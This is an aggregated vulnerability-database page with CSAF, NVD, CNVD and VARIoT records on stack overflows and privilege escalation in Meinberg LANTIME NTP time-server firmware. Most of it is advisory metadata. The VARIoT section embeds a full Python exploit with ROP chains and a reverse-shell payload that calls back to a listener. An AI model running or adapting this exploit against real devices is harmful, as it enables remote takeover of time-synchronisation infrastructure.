"details": "Meinberg has produced a new firmware Version 6.20.004. The new firmware can be downloaded by using the link below: (https://urldefense.proofpoint.com/v2/url?u=http-3A__www.meinberg.de_download_firmware_lantime_v6_firmware-2D6.20.004-2Dx86.rel\u0026d=BQIFaQ\u0026c=54IZrppPQZKX9mLzcGdPfFD1hxrcB__aEkJFOKJFd00\u0026r=zE5lG3CZZIbdBvT6slVAzQ\u0026m=n4ZBSsrF-RphS7eiqohm3WcJ2BYQUCwQUHwVPHNFa6o\u0026s=WlQnlBzw05tnJ1o29nmeXtGBbNubzjyRPqaWAdpXn5Y\u0026e=)",
"product_ids": [
"CSAFPID-0001",
"CSAFPID-0002",
"CSAFPID-0003",
"CSAFPID-0004",
"CSAFPID-0005",
"CSAFPID-0006",
"CSAFPID-0007",
"CSAFPID-0008",
"CSAFPID-0009",
"CSAFPID-0010",
"CSAFPID-0011"
],
"url": "https://urldefense.proofpoint.com/v2/url?u=http-3A__www.meinberg.de_download_firmware_lantime_v6_firmware-2D6.20.004-2Dx86.rel\u0026d=BQIFaQ\u0026c=54IZrppPQZKX9mLzcGdPfFD1hxrcB__aEkJFOKJFd00\u0026r=zE5lG3CZZIbdBvT6slVAzQ\u0026m=n4ZBSsrF-RphS7eiqohm3WcJ2BYQUCwQUHwVPHNFa6o\u0026s=WlQnlBzw05tnJ1o29nmeXtGBbNubzjyRPqaWAdpXn5Y\u0026e="
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
},
"products": [
"CSAFPID-0001",
"CSAFPID-0002",
"CSAFPID-0003",
"CSAFPID-0004",
"CSAFPID-0005",
"CSAFPID-0006",
"CSAFPID-0007",
"CSAFPID-0008",
"CSAFPID-0009",
"CSAFPID-0010",
"CSAFPID-0011"
]
}
]
},
{
"cve": "CVE-2016-3989",
"cwe": {
"id": "CWE-121",
"name": "Stack-based Buffer Overflow"
},
"notes": [
{
"category": "summary",
"text": "The NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote authenticated users to obtain root privileges for writing to unspecified scripts, and consequently obtain sensitive information or modify data, by leveraging access to the nobody account.",
"title": "Vulnerability Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001",
"CSAFPID-0002",
"CSAFPID-0003",
"CSAFPID-0004",
"CSAFPID-0005",
"CSAFPID-0006",
"CSAFPID-0007",
"CSAFPID-0008",
"CSAFPID-0009",
"CSAFPID-0010",
"CSAFPID-0011"
]
},
"remediations": [
{
"category": "mitigation",
"details": "Meinberg has produced a new firmware Version 6.20.004. The new firmware can be downloaded by using the link below: (https://urldefense.proofpoint.com/v2/url?u=http-3A__www.meinberg.de_download_firmware_lantime_v6_firmware-2D6.20.004-2Dx86.rel\u0026d=BQIFaQ\u0026c=54IZrppPQZKX9mLzcGdPfFD1hxrcB__aEkJFOKJFd00\u0026r=zE5lG3CZZIbdBvT6slVAzQ\u0026m=n4ZBSsrF-RphS7eiqohm3WcJ2BYQUCwQUHwVPHNFa6o\u0026s=WlQnlBzw05tnJ1o29nmeXtGBbNubzjyRPqaWAdpXn5Y\u0026e=)",
"product_ids": [
"CSAFPID-0001",
"CSAFPID-0002",
"CSAFPID-0003",
"CSAFPID-0004",
"CSAFPID-0005",
"CSAFPID-0006",
"CSAFPID-0007",
"CSAFPID-0008",
"CSAFPID-0009",
"CSAFPID-0010",
"CSAFPID-0011"
],
"url": "https://urldefense.proofpoint.com/v2/url?u=http-3A__www.meinberg.de_download_firmware_lantime_v6_firmware-2D6.20.004-2Dx86.rel\u0026d=BQIFaQ\u0026c=54IZrppPQZKX9mLzcGdPfFD1hxrcB__aEkJFOKJFd00\u0026r=zE5lG3CZZIbdBvT6slVAzQ\u0026m=n4ZBSsrF-RphS7eiqohm3WcJ2BYQUCwQUHwVPHNFa6o\u0026s=WlQnlBzw05tnJ1o29nmeXtGBbNubzjyRPqaWAdpXn5Y\u0026e="
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.0"
},
"products": [
"CSAFPID-0001",
"CSAFPID-0002",
"CSAFPID-0003",
"CSAFPID-0004",
"CSAFPID-0005",
"CSAFPID-0006",
"CSAFPID-0007",
"CSAFPID-0008",
"CSAFPID-0009",
"CSAFPID-0010",
"CSAFPID-0011"
]
}
]
}
]
}
GSD-2016-3962
Vulnerability from gsd - Updated: 2023-12-13 01:21{
"GSD": {
"alias": "CVE-2016-3962",
"description": "Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request.",
"id": "GSD-2016-3962",
"references": [
"https://packetstormsecurity.com/files/cve/CVE-2016-3962"
]
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2016-3962"
],
"details": "Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request.",
"id": "GSD-2016-3962",
"modified": "2023-12-13T01:21:27.652953Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-3962",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "40120",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/40120/"
},
{
"name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03",
"refsource": "MISC",
"url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03"
}
]
}
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:meinberg:ntp_server_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "6.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:meinberg:lantime_m900:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:meinberg:ims-lantime_m500:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:meinberg:lantime_m400:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:meinberg:lantime_m600:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:meinberg:lces:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:meinberg:syncfire_1100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:meinberg:ims-lantime_m1000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:meinberg:ims-lantime_m3000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:meinberg:lantime_m100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:meinberg:lantime_m200:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:meinberg:lantime_m300:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-3962"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03"
},
{
"name": "40120",
"refsource": "EXPLOIT-DB",
"tags": [],
"url": "https://www.exploit-db.com/exploits/40120/"
}
]
}
},
"impact": {
"baseMetricV2": {
"cvssV2": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"userInteractionRequired": false
},
"baseMetricV3": {
"cvssV3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4
}
},
"lastModifiedDate": "2017-09-03T01:29Z",
"publishedDate": "2016-07-03T14:59Z"
}
}
}
CNVD-2016-04405
Vulnerability from cnvd - Published: 2016-07-01目前厂商已经发布了升级补丁以修复此安全问题,详情请关注厂商主页: https://www.meinberg.de/
| Name | ['Meinberg LCES <=6.0', 'Meinberg SyncFire 1100 <=6.0', 'Meinberg LANTIME M900 <=6.0', 'Meinberg IMS-LANTIME M3000 <=6.0', 'Meinberg LANTIME M100 <=6.0', 'Meinberg LANTIME M200 <=6.0', 'Meinberg LANTIME M300 <=6.0', 'Meinberg LANTIME M400 <=6.0', 'Meinberg LANTIME M600 <=6.0', 'Meinberg IMS-LANTIME M500 <=6.0', 'Meinberg IMS-LANTIME M1000 <=6.0'] |
|---|
{
"cves": {
"cve": {
"cveNumber": "CVE-2016-3962"
}
},
"description": "Meinberg IMS-LANTIME M3000\u7b49\u90fd\u662f\u5fb7\u56fdMeinberg\u516c\u53f8\u7684NTP\u65f6\u95f4\u670d\u52a1\u5668\u3002\r\n\r\n\u591a\u6b3eMeinberg\u4ea7\u54c1\u4e2d\u5b58\u5728\u6808\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u501f\u52a9POST\u8bf7\u6c42\u4e2d\u7684\u53c2\u6570\uff0c\u5229\u7528\u8be5\u6f0f\u6d1e\u9020\u6210\u7f13\u51b2\u533a\u6ea2\u51fa\u3002",
"discovererName": "unknown",
"formalWay": "\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6b64\u5b89\u5168\u95ee\u9898\uff0c\u8be6\u60c5\u8bf7\u5173\u6ce8\u5382\u5546\u4e3b\u9875\uff1a\r\nhttps://www.meinberg.de/",
"isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
"number": "CNVD-2016-04405",
"openTime": "2016-07-01",
"patchDescription": "Meinberg IMS-LANTIME M3000\u7b49\u90fd\u662f\u5fb7\u56fdMeinberg\u516c\u53f8\u7684NTP\u65f6\u95f4\u670d\u52a1\u5668\u3002\r\n\r\n\u591a\u6b3eMeinberg\u4ea7\u54c1\u4e2d\u5b58\u5728\u6808\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u501f\u52a9POST\u8bf7\u6c42\u4e2d\u7684\u53c2\u6570\uff0c\u5229\u7528\u8be5\u6f0f\u6d1e\u9020\u6210\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
"patchName": "\u591a\u6b3eMeinberg\u4ea7\u54c1\u6808\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff08CNVD-2016-04405\uff09\u7684\u8865\u4e01",
"products": {
"product": [
"Meinberg LCES \u003c=6.0",
"Meinberg SyncFire 1100 \u003c=6.0",
"Meinberg LANTIME M900 \u003c=6.0",
"Meinberg IMS-LANTIME M3000 \u003c=6.0",
"Meinberg LANTIME M100 \u003c=6.0",
"Meinberg LANTIME M200 \u003c=6.0",
"Meinberg LANTIME M300 \u003c=6.0",
"Meinberg LANTIME M400 \u003c=6.0",
"Meinberg LANTIME M600 \u003c=6.0",
"Meinberg IMS-LANTIME M500 \u003c=6.0",
"Meinberg IMS-LANTIME M1000 \u003c=6.0"
]
},
"referenceLink": "https://www.meinberg.de/",
"serverity": "\u4e2d",
"submitTime": "2016-06-28",
"title": "\u591a\u6b3eMeinberg\u4ea7\u54c1\u6808\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff08CNVD-2016-04405\uff09"
}
VAR-201607-0010
Vulnerability from variot - Updated: 2025-04-13 23:02Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request. Meinberg NTP Time Server is prone to multiple privilege-escalation and stack-based buffer-overflow vulnerabilities. Remote attackers can exploit these issues to execute arbitrary code in the context of the application or gain elevated privileges. Other attacks are also possible. The following products are affected : Meinberg IMS-LANTIME M3000 Version 6.0 and prior Meinberg IMS-LANTIME M1000 Version 6.0 and prior Meinberg IMS-LANTIME M500 Version 6.0 and prior Meinberg LANTIME M900 Version 6.0 and prior Meinberg LANTIME M600 Version 6.0 and prior Meinberg LANTIME M400 Version 6.0 and prior Meinberg LANTIME M300 Version 6.0 and prior Meinberg LANTIME M200 Version 6.0 and prior Meinberg LANTIME M100 Version 6.0 and prior Meinberg SyncFire 1100 Version 6.0 and prior Meinberg LCES Version 6.0 and prior. Meinberg IMS-LANTIME M3000 etc. are all NTP time servers of German Meinberg company. #!/usr/bin/python
EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit
EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/
271 - trigger notifications
299 - copy user defined notifications
Kernel Version: 2.6.15.1
System Version: 530
Lantime configuration utility 1.27
ELX800/GPS M4x V5.30p
import socket import struct import telnetlib import sys import time
if len(sys.argv) < 3: print "[-] " exit(1)
host = sys.argv[1] callback_ip = sys.argv[2]
print "[+] exploiting Meinburg M400" port = 80
Copy user_defined_notification to /www/filetmp
Append reverse shell string to /file/tmp
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) )
param = "A" * 0x2850
resp = "POST /cgi-bin/main HTTP/1.1\r\n" resp += "Host: " + host + "\r\n" resp += "User-Agent: Mozilla/5.0\r\n" resp += "Accept: text/html\r\n" resp += "Accept-Language: en-US\r\n" resp += "Connection: keep-alive\r\n" resp += "Content-Type: application/x-www-form-urlencoded\r\n"
system = 0x80490B0 exit = 0x80492C0 some_str = 0x850BDB8
must have a listener setup to receive the callback connection on ip 192.168.60.232
i.e. nc -v -l -p 4444
command = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo "{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash/tmp/foo;" >> /www/filetmp'
msg = "button=" + "A"*10028 msg += struct.pack("I", system ) msg += struct.pack("I", exit ) msg += struct.pack("I", some_str ) msg += command + "\x00"
resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" resp += msg csock.send(resp) csock.close()
time.sleep(1)
Copy /www/filetmp to user_defined_notification
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) )
param = "A" * 0x2850
resp = "POST /cgi-bin/main HTTP/1.1\r\n" resp += "Host: " + host + "\r\n" resp += "User-Agent: Mozilla/5.0\r\n" resp += "Accept: text/html\r\n" resp += "Accept-Language: en-US\r\n" resp += "Connection: keep-alive\r\n" resp += "Content-Type: application/x-www-form-urlencoded\r\n"
send_cmd = 0x807ED88 system = 0x80490B0 exit = 0x80492C0 some_str = 0x850BDB8 ret = 0x804CE65
stack pivot
stack_pivot = 0x8049488 msg = "button=" + "A" * 9756
msg += "B" * 28 msg += struct.pack("I", 0x7FFEE01A ) # ebp msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret msg += struct.pack("I", some_str - 0x100 ) # some place msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret msg += struct.pack("I", ret ) * (71/4)
msg += struct.pack("I", send_cmd ) msg += struct.pack("I", exit ) msg += struct.pack("I", 0x80012111 ) # [eax + 0x60] msg += struct.pack("I", some_str ) # buffer msg += struct.pack("I", 0xffffffff ) # count msg += "E" * 120
msg += struct.pack("I", 0xB1E8B434 ) # ebx msg += struct.pack("I", some_str - 100 ) # esi msg += struct.pack("I", some_str - 100 ) # edi msg += struct.pack("I", some_str - 0x100 ) # ebp msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret msg += "A" * 100
resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" resp += msg csock.send(resp) csock.close
time.sleep(1)
Trigger reverse shell
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) )
param = "A" * 0x2850
resp = "POST /cgi-bin/main HTTP/1.1\r\n" resp += "Host: " + host + "\r\n" resp += "User-Agent: Mozilla/5.0\r\n" resp += "Accept: text/html\r\n" resp += "Accept-Language: en-US\r\n" resp += "Connection: keep-alive\r\n" resp += "Content-Type: application/x-www-form-urlencoded\r\n"
send_cmd = 0x807ED88 system = 0x80490B0 exit = 0x80492C0 some_str = 0x850BDB8 ret = 0x804CE65
stack pivot
stack_pivot = 0x8049488 msg = "button=" + "A" * 9756
msg += "B" * 28 msg += struct.pack("I", 0x7FFEE01A ) # ebp msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret msg += struct.pack("I", some_str - 0x100 ) # some place msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret msg += struct.pack("I", ret ) * (71/4)
msg += struct.pack("I", send_cmd ) msg += struct.pack("I", exit ) msg += struct.pack("I", 0x800120f5 ) # [eax + 0x60] msg += struct.pack("I", some_str ) # buffer msg += struct.pack("I", 0xffffffff ) # count msg += "E" * 120
msg += struct.pack("I", 0xB1E8B434 ) # ebx msg += struct.pack("I", some_str - 100 ) # esi msg += struct.pack("I", some_str - 100 ) # edi msg += struct.pack("I", some_str - 0x100 ) # ebp msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret msg += "A" * 100
resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" resp += msg csock.send(resp) csock.close()
time.sleep(1)
print "[+] cleaning up"
Kill all mains that are hung-up
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) )
param = "A" * 0x2850
resp = "POST /cgi-bin/main HTTP/1.1\r\n" resp += "Host: " + host + "\r\n" resp += "User-Agent: Mozilla/5.0\r\n" resp += "Accept: text/html\r\n" resp += "Accept-Language: en-US\r\n" resp += "Connection: keep-alive\r\n" resp += "Content-Type: application/x-www-form-urlencoded\r\n"
system = 0x80490B0 exit = 0x80492C0 some_str = 0x850BDB8
command = 'killall main'
msg = "button=" + "A"*10028 msg += struct.pack("I", system ) msg += struct.pack("I", exit ) msg += struct.pack("I", some_str ) msg += command + "\x00"
resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" resp += msg csock.send(resp) csock.close()
print "[+] enjoy"
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201607-0010",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "lces",
"scope": "eq",
"trust": 1.0,
"vendor": "meinberg",
"version": null
},
{
"model": "lantime m100",
"scope": "eq",
"trust": 1.0,
"vendor": "meinberg",
"version": null
},
{
"model": "lantime m200",
"scope": "eq",
"trust": 1.0,
"vendor": "meinberg",
"version": null
},
{
"model": "ims-lantime m3000",
"scope": "eq",
"trust": 1.0,
"vendor": "meinberg",
"version": null
},
{
"model": "lantime m300",
"scope": "eq",
"trust": 1.0,
"vendor": "meinberg",
"version": null
},
{
"model": "ntp server",
"scope": "lte",
"trust": 1.0,
"vendor": "meinberg",
"version": "6.0"
},
{
"model": "ims-lantime m1000",
"scope": "eq",
"trust": 1.0,
"vendor": "meinberg",
"version": null
},
{
"model": "lantime m400",
"scope": "eq",
"trust": 1.0,
"vendor": "meinberg",
"version": null
},
{
"model": "lantime m600",
"scope": "eq",
"trust": 1.0,
"vendor": "meinberg",
"version": null
},
{
"model": "syncfire 1100",
"scope": "eq",
"trust": 1.0,
"vendor": "meinberg",
"version": null
},
{
"model": "ims-lantime m500",
"scope": "eq",
"trust": 1.0,
"vendor": "meinberg",
"version": null
},
{
"model": "lantime m900",
"scope": "eq",
"trust": 1.0,
"vendor": "meinberg",
"version": null
},
{
"model": "ims-lantime m1000",
"scope": null,
"trust": 0.8,
"vendor": "meinberg funkuhren",
"version": null
},
{
"model": "ims-lantime m3000",
"scope": null,
"trust": 0.8,
"vendor": "meinberg funkuhren",
"version": null
},
{
"model": "ims-lantime m500",
"scope": null,
"trust": 0.8,
"vendor": "meinberg funkuhren",
"version": null
},
{
"model": "lantime m100",
"scope": null,
"trust": 0.8,
"vendor": "meinberg funkuhren",
"version": null
},
{
"model": "lantime m200",
"scope": null,
"trust": 0.8,
"vendor": "meinberg funkuhren",
"version": null
},
{
"model": "lantime m300",
"scope": null,
"trust": 0.8,
"vendor": "meinberg funkuhren",
"version": null
},
{
"model": "lantime m400",
"scope": null,
"trust": 0.8,
"vendor": "meinberg funkuhren",
"version": null
},
{
"model": "lantime m600",
"scope": null,
"trust": 0.8,
"vendor": "meinberg funkuhren",
"version": null
},
{
"model": "lantime m900",
"scope": null,
"trust": 0.8,
"vendor": "meinberg funkuhren",
"version": null
},
{
"model": "lces",
"scope": null,
"trust": 0.8,
"vendor": "meinberg funkuhren",
"version": null
},
{
"model": "ntp server",
"scope": "lt",
"trust": 0.8,
"vendor": "meinberg funkuhren",
"version": "6.20.004"
},
{
"model": "syncfire 1100",
"scope": null,
"trust": 0.8,
"vendor": "meinberg funkuhren",
"version": null
},
{
"model": "ntp server",
"scope": "eq",
"trust": 0.6,
"vendor": "meinberg",
"version": "6.0"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003488"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-551"
},
{
"db": "NVD",
"id": "CVE-2016-3962"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:meinberg:ims-lantime_m1000",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:meinberg:ims-lantime_m3000",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:meinberg:ims-lantime_m500",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:meinberg:lantime_m100",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:meinberg:lantime_m200",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:meinberg:lantime_m300",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:meinberg:lantime_m400",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:meinberg:lantime_m600",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:meinberg:lantime_m900",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:meinberg:lces",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:meinberg:ntp_server_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:meinberg:syncfire_1100",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003488"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ryan Wincey",
"sources": [
{
"db": "BID",
"id": "91400"
}
],
"trust": 0.3
},
"cve": "CVE-2016-3962",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
